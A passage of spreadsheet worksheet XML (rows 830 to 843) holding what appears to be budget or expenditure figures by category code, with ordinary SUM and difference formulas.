        <v>0</v>
      </c>
      <c r="AP830" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="831" ht="18" customHeight="1" spans="1:42">
      <c r="A831" s="10"/>
      <c r="B831" s="10"/>
      <c r="C831" s="31"/>
      <c r="D831" s="10">
        <v>2120104</v>
      </c>
      <c r="E831" s="16" t="s">
        <v>3621</v>
      </c>
      <c r="F831" s="14">
        <f t="shared" si="380"/>
        <v>6</v>
      </c>
      <c r="G831" s="17"/>
      <c r="H831" s="17">
        <v>3</v>
      </c>
      <c r="I831" s="17"/>
      <c r="J831" s="17"/>
      <c r="K831" s="17">
        <v>3</v>
      </c>
      <c r="L831" s="17">
        <v>3</v>
      </c>
      <c r="M831" s="17"/>
      <c r="N831" s="17"/>
      <c r="O831" s="17"/>
      <c r="P831" s="17"/>
      <c r="Q831" s="17"/>
      <c r="R831" s="17"/>
      <c r="S831" s="17"/>
      <c r="T831" s="17">
        <v>3</v>
      </c>
      <c r="U831" s="17"/>
      <c r="V831" s="17"/>
      <c r="W831" s="17">
        <v>2</v>
      </c>
      <c r="X831" s="17">
        <v>3</v>
      </c>
      <c r="Y831" s="17"/>
      <c r="Z831" s="17"/>
      <c r="AA831" s="17"/>
      <c r="AB831" s="17"/>
      <c r="AC831" s="17"/>
      <c r="AD831" s="17"/>
      <c r="AE831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AF831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AG831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI831" s="17">
        <f t="shared" si="418"/>
        <v>1</v>
      </c>
      <c r="AJ831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AP831" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="832" ht="18" customHeight="1" spans="1:42">
      <c r="A832" s="10"/>
      <c r="B832" s="10"/>
      <c r="C832" s="31"/>
      <c r="D832" s="10">
        <v>2120105</v>
      </c>
      <c r="E832" s="16" t="s">
        <v>3622</v>
      </c>
      <c r="F832" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G832" s="17"/>
      <c r="H832" s="17"/>
      <c r="I832" s="17"/>
      <c r="J832" s="17"/>
      <c r="K832" s="17"/>
      <c r="L832" s="17"/>
      <c r="M832" s="17"/>
      <c r="N832" s="17"/>
      <c r="O832" s="17"/>
      <c r="P832" s="17"/>
      <c r="Q832" s="17"/>
      <c r="R832" s="17"/>
      <c r="S832" s="17"/>
      <c r="T832" s="17"/>
      <c r="U832" s="17"/>
      <c r="V832" s="17"/>
      <c r="W832" s="17"/>
      <c r="X832" s="17"/>
      <c r="Y832" s="17"/>
      <c r="Z832" s="17"/>
      <c r="AA832" s="17"/>
      <c r="AB832" s="17"/>
      <c r="AC832" s="17"/>
      <c r="AD832" s="17"/>
      <c r="AE832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AF832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AG832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AJ832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AP832" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="833" ht="18" customHeight="1" spans="1:42">
      <c r="A833" s="10"/>
      <c r="B833" s="10"/>
      <c r="C833" s="31"/>
      <c r="D833" s="10">
        <v>2120106</v>
      </c>
      <c r="E833" s="16" t="s">
        <v>3623</v>
      </c>
      <c r="F833" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G833" s="17"/>
      <c r="H833" s="17"/>
      <c r="I833" s="17"/>
      <c r="J833" s="17"/>
      <c r="K833" s="17"/>
      <c r="L833" s="17"/>
      <c r="M833" s="17"/>
      <c r="N833" s="17"/>
      <c r="O833" s="17"/>
      <c r="P833" s="17"/>
      <c r="Q833" s="17"/>
      <c r="R833" s="17"/>
      <c r="S833" s="17"/>
      <c r="T833" s="17"/>
      <c r="U833" s="17"/>
      <c r="V833" s="17"/>
      <c r="W833" s="17"/>
      <c r="X833" s="17"/>
      <c r="Y833" s="17"/>
      <c r="Z833" s="17"/>
      <c r="AA833" s="17"/>
      <c r="AB833" s="17"/>
      <c r="AC833" s="17"/>
      <c r="AD833" s="17"/>
      <c r="AE833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AF833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AG833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AJ833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AP833" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="834" ht="18" customHeight="1" spans="1:42">
      <c r="A834" s="10"/>
      <c r="B834" s="10"/>
      <c r="C834" s="31"/>
      <c r="D834" s="10">
        <v>2120107</v>
      </c>
      <c r="E834" s="16" t="s">
        <v>3624</v>
      </c>
      <c r="F834" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G834" s="17"/>
      <c r="H834" s="17"/>
      <c r="I834" s="17"/>
      <c r="J834" s="17"/>
      <c r="K834" s="17"/>
      <c r="L834" s="17"/>
      <c r="M834" s="17"/>
      <c r="N834" s="17"/>
      <c r="O834" s="17"/>
      <c r="P834" s="17"/>
      <c r="Q834" s="17"/>
      <c r="R834" s="17"/>
      <c r="S834" s="17"/>
      <c r="T834" s="17"/>
      <c r="U834" s="17"/>
      <c r="V834" s="17"/>
      <c r="W834" s="17"/>
      <c r="X834" s="17"/>
      <c r="Y834" s="17"/>
      <c r="Z834" s="17"/>
      <c r="AA834" s="17"/>
      <c r="AB834" s="17"/>
      <c r="AC834" s="17"/>
      <c r="AD834" s="17"/>
      <c r="AE834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AF834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AG834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AJ834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AP834" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="835" ht="18" customHeight="1" spans="1:42">
      <c r="A835" s="10"/>
      <c r="B835" s="10"/>
      <c r="C835" s="31"/>
      <c r="D835" s="10">
        <v>2120109</v>
      </c>
      <c r="E835" s="16" t="s">
        <v>3625</v>
      </c>
      <c r="F835" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G835" s="17"/>
      <c r="H835" s="17"/>
      <c r="I835" s="17"/>
      <c r="J835" s="17"/>
      <c r="K835" s="17"/>
      <c r="L835" s="17"/>
      <c r="M835" s="17"/>
      <c r="N835" s="17"/>
      <c r="O835" s="17"/>
      <c r="P835" s="17"/>
      <c r="Q835" s="17"/>
      <c r="R835" s="17"/>
      <c r="S835" s="17"/>
      <c r="T835" s="17"/>
      <c r="U835" s="17"/>
      <c r="V835" s="17"/>
      <c r="W835" s="17"/>
      <c r="X835" s="17"/>
      <c r="Y835" s="17"/>
      <c r="Z835" s="17"/>
      <c r="AA835" s="17"/>
      <c r="AB835" s="17"/>
      <c r="AC835" s="17"/>
      <c r="AD835" s="17"/>
      <c r="AE835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AF835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AG835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AJ835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AP835" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="836" ht="18" customHeight="1" spans="1:42">
      <c r="A836" s="10"/>
      <c r="B836" s="10"/>
      <c r="C836" s="31"/>
      <c r="D836" s="10">
        <v>2120110</v>
      </c>
      <c r="E836" s="16" t="s">
        <v>3626</v>
      </c>
      <c r="F836" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G836" s="17"/>
      <c r="H836" s="17"/>
      <c r="I836" s="17"/>
      <c r="J836" s="17"/>
      <c r="K836" s="17"/>
      <c r="L836" s="17"/>
      <c r="M836" s="17"/>
      <c r="N836" s="17"/>
      <c r="O836" s="17"/>
      <c r="P836" s="17"/>
      <c r="Q836" s="17"/>
      <c r="R836" s="17"/>
      <c r="S836" s="17"/>
      <c r="T836" s="17"/>
      <c r="U836" s="17"/>
      <c r="V836" s="17"/>
      <c r="W836" s="17"/>
      <c r="X836" s="17"/>
      <c r="Y836" s="17"/>
      <c r="Z836" s="17"/>
      <c r="AA836" s="17"/>
      <c r="AB836" s="17"/>
      <c r="AC836" s="17"/>
      <c r="AD836" s="17"/>
      <c r="AE836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AF836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AG836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AJ836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AP836" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="837" ht="18" customHeight="1" spans="1:42">
      <c r="A837" s="10"/>
      <c r="B837" s="10"/>
      <c r="C837" s="31"/>
      <c r="D837" s="10">
        <v>2120199</v>
      </c>
      <c r="E837" s="16" t="s">
        <v>3627</v>
      </c>
      <c r="F837" s="14">
        <f t="shared" si="380"/>
        <v>9</v>
      </c>
      <c r="G837" s="17"/>
      <c r="H837" s="17"/>
      <c r="I837" s="17"/>
      <c r="J837" s="17"/>
      <c r="K837" s="17">
        <v>9</v>
      </c>
      <c r="L837" s="17"/>
      <c r="M837" s="17"/>
      <c r="N837" s="17"/>
      <c r="O837" s="17"/>
      <c r="P837" s="17"/>
      <c r="Q837" s="17"/>
      <c r="R837" s="17"/>
      <c r="S837" s="17"/>
      <c r="T837" s="17"/>
      <c r="U837" s="17"/>
      <c r="V837" s="17"/>
      <c r="W837" s="17">
        <v>9</v>
      </c>
      <c r="X837" s="17"/>
      <c r="Y837" s="17"/>
      <c r="Z837" s="17"/>
      <c r="AA837" s="17"/>
      <c r="AB837" s="17"/>
      <c r="AC837" s="17"/>
      <c r="AD837" s="17"/>
      <c r="AE837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AF837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AG837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AH837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AI837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AJ837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AK837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AL837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AM837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AN837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AO837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
      <c r="AP837" s="17">
        <f t="shared" si="418"/>
        <v>0</v>
      </c>
    </row>
    <row r="838" ht="18" customHeight="1" spans="1:42">
      <c r="A838" s="10"/>
      <c r="B838" s="10"/>
      <c r="C838" s="31"/>
      <c r="D838" s="10">
        <v>21202</v>
      </c>
      <c r="E838" s="11" t="s">
        <v>3628</v>
      </c>
      <c r="F838" s="14">
        <f t="shared" ref="F838:F901" si="419">SUM(I838:R838)</f>
        <v>8</v>
      </c>
      <c r="G838" s="12">
        <f t="shared" ref="G838:R838" si="420">G839</f>
        <v>0</v>
      </c>
      <c r="H838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="I838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="J838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="K838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="L838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="M838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="N838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="O838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="P838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="Q838" s="12">
        <f t="shared" si="420"/>
        <v>0</v>
      </c>
      <c r="R838" s="12">
        <f t="shared" si="420"/>
        <v>8</v>
      </c>
      <c r="S838" s="12">
        <v>0</v>
      </c>
      <c r="T838" s="12">
        <v>0</v>
      </c>
      <c r="U838" s="12">
        <v>0</v>
      </c>
      <c r="V838" s="12">
        <v>0</v>
      </c>
      <c r="W838" s="12">
        <v>0</v>
      </c>
      <c r="X838" s="12">
        <v>0</v>
      </c>
      <c r="Y838" s="12">
        <v>0</v>
      </c>
      <c r="Z838" s="12">
        <v>0</v>
      </c>
      <c r="AA838" s="12">
        <v>0</v>
      </c>
      <c r="AB838" s="12">
        <v>0</v>
      </c>
      <c r="AC838" s="12">
        <v>0</v>
      </c>
      <c r="AD838" s="12">
        <v>8</v>
      </c>
      <c r="AE838" s="12">
        <f t="shared" ref="AE838:AP838" si="421">AE839</f>
        <v>0</v>
      </c>
      <c r="AF838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AG838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AH838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AI838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AJ838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AK838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AL838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AM838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AN838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AO838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
      <c r="AP838" s="12">
        <f t="shared" si="421"/>
        <v>0</v>
      </c>
    </row>
    <row r="839" ht="18" customHeight="1" spans="1:42">
      <c r="A839" s="10"/>
      <c r="B839" s="10"/>
      <c r="C839" s="31"/>
      <c r="D839" s="10">
        <v>2120201</v>
      </c>
      <c r="E839" s="16" t="s">
        <v>3629</v>
      </c>
      <c r="F839" s="14">
        <f t="shared" si="419"/>
        <v>8</v>
      </c>
      <c r="G839" s="17"/>
      <c r="H839" s="17"/>
      <c r="I839" s="17"/>
      <c r="J839" s="17"/>
      <c r="K839" s="17"/>
      <c r="L839" s="17"/>
      <c r="M839" s="17"/>
      <c r="N839" s="17"/>
      <c r="O839" s="17"/>
      <c r="P839" s="17"/>
      <c r="Q839" s="17"/>
      <c r="R839" s="17">
        <v>8</v>
      </c>
      <c r="S839" s="17"/>
      <c r="T839" s="17"/>
      <c r="U839" s="17"/>
      <c r="V839" s="17"/>
      <c r="W839" s="17"/>
      <c r="X839" s="17"/>
      <c r="Y839" s="17"/>
      <c r="Z839" s="17"/>
      <c r="AA839" s="17"/>
      <c r="AB839" s="17"/>
      <c r="AC839" s="17"/>
      <c r="AD839" s="17">
        <v>8</v>
      </c>
      <c r="AE839" s="17">
        <f>G839-S839</f>
        <v>0</v>
      </c>
      <c r="AF839" s="17">
        <f t="shared" ref="AF839:AP839" si="422">H839-T839</f>
        <v>0</v>
      </c>
      <c r="AG839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
      <c r="AH839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
      <c r="AI839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
      <c r="AJ839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
      <c r="AK839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
      <c r="AL839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
      <c r="AM839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
      <c r="AN839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
      <c r="AO839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
      <c r="AP839" s="17">
        <f t="shared" si="422"/>
        <v>0</v>
      </c>
    </row>
    <row r="840" ht="18" customHeight="1" spans="1:42">
      <c r="A840" s="10"/>
      <c r="B840" s="10"/>
      <c r="C840" s="31"/>
      <c r="D840" s="10">
        <v>21203</v>
      </c>
      <c r="E840" s="11" t="s">
        <v>3630</v>
      </c>
      <c r="F840" s="14">
        <f t="shared" si="419"/>
        <v>1523</v>
      </c>
      <c r="G840" s="12">
        <f t="shared" ref="G840:R840" si="423">SUM(G841:G842)</f>
        <v>37</v>
      </c>
      <c r="H840" s="12">
        <f t="shared" si="423"/>
        <v>75</v>
      </c>
      <c r="I840" s="12">
        <f t="shared" si="423"/>
        <v>0</v>
      </c>
      <c r="J840" s="12">
        <f t="shared" si="423"/>
        <v>0</v>
      </c>
      <c r="K840" s="12">
        <f t="shared" si="423"/>
        <v>92</v>
      </c>
      <c r="L840" s="12">
        <f t="shared" si="423"/>
        <v>1387</v>
      </c>
      <c r="M840" s="12">
        <f t="shared" si="423"/>
        <v>13</v>
      </c>
      <c r="N840" s="12">
        <f t="shared" si="423"/>
        <v>0</v>
      </c>
      <c r="O840" s="12">
        <f t="shared" si="423"/>
        <v>0</v>
      </c>
      <c r="P840" s="12">
        <f t="shared" si="423"/>
        <v>0</v>
      </c>
      <c r="Q840" s="12">
        <f t="shared" si="423"/>
        <v>0</v>
      </c>
      <c r="R840" s="12">
        <f t="shared" si="423"/>
        <v>31</v>
      </c>
      <c r="S840" s="12">
        <v>37</v>
      </c>
      <c r="T840" s="12">
        <v>75</v>
      </c>
      <c r="U840" s="12">
        <v>0</v>
      </c>
      <c r="V840" s="12">
        <v>0</v>
      </c>
      <c r="W840" s="12">
        <v>88</v>
      </c>
      <c r="X840" s="12">
        <v>958</v>
      </c>
      <c r="Y840" s="12">
        <v>13</v>
      </c>
      <c r="Z840" s="12">
        <v>0</v>
      </c>
      <c r="AA840" s="12">
        <v>0</v>
      </c>
      <c r="AB840" s="12">
        <v>0</v>
      </c>
      <c r="AC840" s="12">
        <v>0</v>
      </c>
      <c r="AD840" s="12">
        <v>31</v>
      </c>
      <c r="AE840" s="12">
        <f t="shared" ref="AE840:AP840" si="424">SUM(AE841:AE842)</f>
        <v>0</v>
      </c>
      <c r="AF840" s="12">
        <f t="shared" si="424"/>
        <v>0</v>
      </c>
      <c r="AG840" s="12">
        <f t="shared" si="424"/>
        <v>0</v>
      </c>
      <c r="AH840" s="12">
        <f t="shared" si="424"/>
        <v>0</v>
      </c>
      <c r="AI840" s="12">
        <f t="shared" si="424"/>
        <v>4</v>
      </c>
      <c r="AJ840" s="12">
        <f t="shared" si="424"/>
        <v>429</v>
      </c>
      <c r="AK840" s="12">
        <f t="shared" si="424"/>
        <v>0</v>
      </c>
      <c r="AL840" s="12">
        <f t="shared" si="424"/>
        <v>0</v>
      </c>
      <c r="AM840" s="12">
        <f t="shared" si="424"/>
        <v>0</v>
      </c>
      <c r="AN840" s="12">
        <f t="shared" si="424"/>
        <v>0</v>
      </c>
      <c r="AO840" s="12">
        <f t="shared" si="424"/>
        <v>0</v>
      </c>
      <c r="AP840" s="12">
        <f t="shared" si="424"/>
        <v>0</v>
      </c>
    </row>
    <row r="841" ht="18" customHeight="1" spans="1:42">
      <c r="A841" s="10"/>
      <c r="B841" s="10"/>
      <c r="C841" s="31"/>
      <c r="D841" s="10">
        <v>2120303</v>
      </c>
      <c r="E841" s="16" t="s">
        <v>3631</v>
      </c>
      <c r="F841" s="14">
        <f t="shared" si="419"/>
        <v>1426</v>
      </c>
      <c r="G841" s="17"/>
      <c r="H841" s="17">
        <v>45</v>
      </c>
      <c r="I841" s="17"/>
      <c r="J841" s="17"/>
      <c r="K841" s="17">
        <v>92</v>
      </c>
      <c r="L841" s="17">
        <v>1290</v>
      </c>
      <c r="M841" s="17">
        <v>13</v>
      </c>
      <c r="N841" s="17"/>
      <c r="O841" s="17"/>
      <c r="P841" s="17"/>
      <c r="Q841" s="17"/>
      <c r="R841" s="17">
        <v>31</v>
      </c>
      <c r="S841" s="17">
        <v>1</v>
      </c>
      <c r="T841" s="17">
        <v>45</v>
      </c>
      <c r="U841" s="17"/>
      <c r="V841" s="17"/>
      <c r="W841" s="17">
        <v>88</v>
      </c>
      <c r="X841" s="17">
        <v>867</v>
      </c>
      <c r="Y841" s="17">
        <v>13</v>
      </c>
      <c r="Z841" s="17"/>
      <c r="AA841" s="17"/>
      <c r="AB841" s="17"/>
      <c r="AC841" s="17"/>
      <c r="AD841" s="17">
        <v>31</v>
      </c>
      <c r="AE841" s="17">
        <f t="shared" ref="AE841:AP842" si="425">G841-S841</f>
        <v>-1</v>
      </c>
      <c r="AF841" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AG841" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AH841" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AI841" s="17">
        <f t="shared" si="425"/>
        <v>4</v>
      </c>
      <c r="AJ841" s="17">
        <f t="shared" si="425"/>
        <v>423</v>
      </c>
      <c r="AK841" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AL841" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AM841" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AN841" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AO841" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AP841" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
    </row>
    <row r="842" ht="18" customHeight="1" spans="1:42">
      <c r="A842" s="10"/>
      <c r="B842" s="10"/>
      <c r="C842" s="28"/>
      <c r="D842" s="10">
        <v>2120399</v>
      </c>
      <c r="E842" s="16" t="s">
        <v>3632</v>
      </c>
      <c r="F842" s="14">
        <f t="shared" si="419"/>
        <v>97</v>
      </c>
      <c r="G842" s="17">
        <v>37</v>
      </c>
      <c r="H842" s="17">
        <v>30</v>
      </c>
      <c r="I842" s="17"/>
      <c r="J842" s="17"/>
      <c r="K842" s="17"/>
      <c r="L842" s="17">
        <v>97</v>
      </c>
      <c r="M842" s="17"/>
      <c r="N842" s="17"/>
      <c r="O842" s="17"/>
      <c r="P842" s="17"/>
      <c r="Q842" s="17"/>
      <c r="R842" s="17"/>
      <c r="S842" s="17">
        <v>36</v>
      </c>
      <c r="T842" s="17">
        <v>30</v>
      </c>
      <c r="U842" s="17"/>
      <c r="V842" s="17"/>
      <c r="W842" s="17"/>
      <c r="X842" s="17">
        <v>91</v>
      </c>
      <c r="Y842" s="17"/>
      <c r="Z842" s="17"/>
      <c r="AA842" s="17"/>
      <c r="AB842" s="17"/>
      <c r="AC842" s="17"/>
      <c r="AD842" s="17"/>
      <c r="AE842" s="17">
        <f t="shared" si="425"/>
        <v>1</v>
      </c>
      <c r="AF842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AG842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AH842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AI842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AJ842" s="17">
        <f t="shared" si="425"/>
        <v>6</v>
      </c>
      <c r="AK842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AL842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AM842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AN842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AO842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
      <c r="AP842" s="17">
        <f t="shared" si="425"/>
        <v>0</v>
      </c>
    </row>
    <row r="843" ht="18" customHeight="1" spans="1:42">
      <c r="A843" s="10"/>
      <c r="B843" s="10"/>
      <c r="C843" s="28"/>
      <c r="D843" s="10">
        <v>21205</v>
      </c>
      <c r="E843" s="11" t="s">
        <v>3633</v>
      </c>
      <c r="F843" s="14">
        <f t="shared" si="419"/>
        <v>550</v>
      </c>
      <c r="G843" s="12">
        <f t="shared" ref="G843:R843" si="426">G844</f>
        <v>263</v>
      </c>
      <c r="H843" s="12">
        <f t="shared" si="426"/>
        <v>124</v>
      </c>
      <c r="I843" s="12">
        <f t="shared" si="426"/>
        <v>50</v>
      </c>
      <c r="J843" s="12">
        <f t="shared" si="426"/>
        <v>0</v>
      </c>
      <c r="K843" s="12">
        <f t="shared" si="426"/>
        <v>0</v>
      </c>
      <c r="L843" s="12">
        <f t="shared" si="426"/>
        <v>452</v>
      </c>
      <c r="M843" s="12">
        <f t="shared" si="426"/>
        <v>14</v>
      </c>
      <c r="N843" s="12">
        <f t="shared" si="426"/>
        <v>0</v>
      </c>
      <c r="O843" s="12">
        <f t="shared" si="426"/>
        <v>0</v>
      </c>
      <c r="P843" s="12">
        <f t="shared" si="426"/>
        <v>28</v>
      </c>
      <c r="Q843" s="12">
        <f t="shared" si="426"/>
        <v>0</v>
      </c>
      <c r="R843" s="12">
        <f t="shared" si="426"/>
        <v>6</v>
      </c>
      <c r="S843" s="12">
        <v>92</v>
      </c>
      <c r="T843" s="12">
        <v>124</v>
      </c>
      <c r="U843" s="12">
        <v>50</v>
      </c>
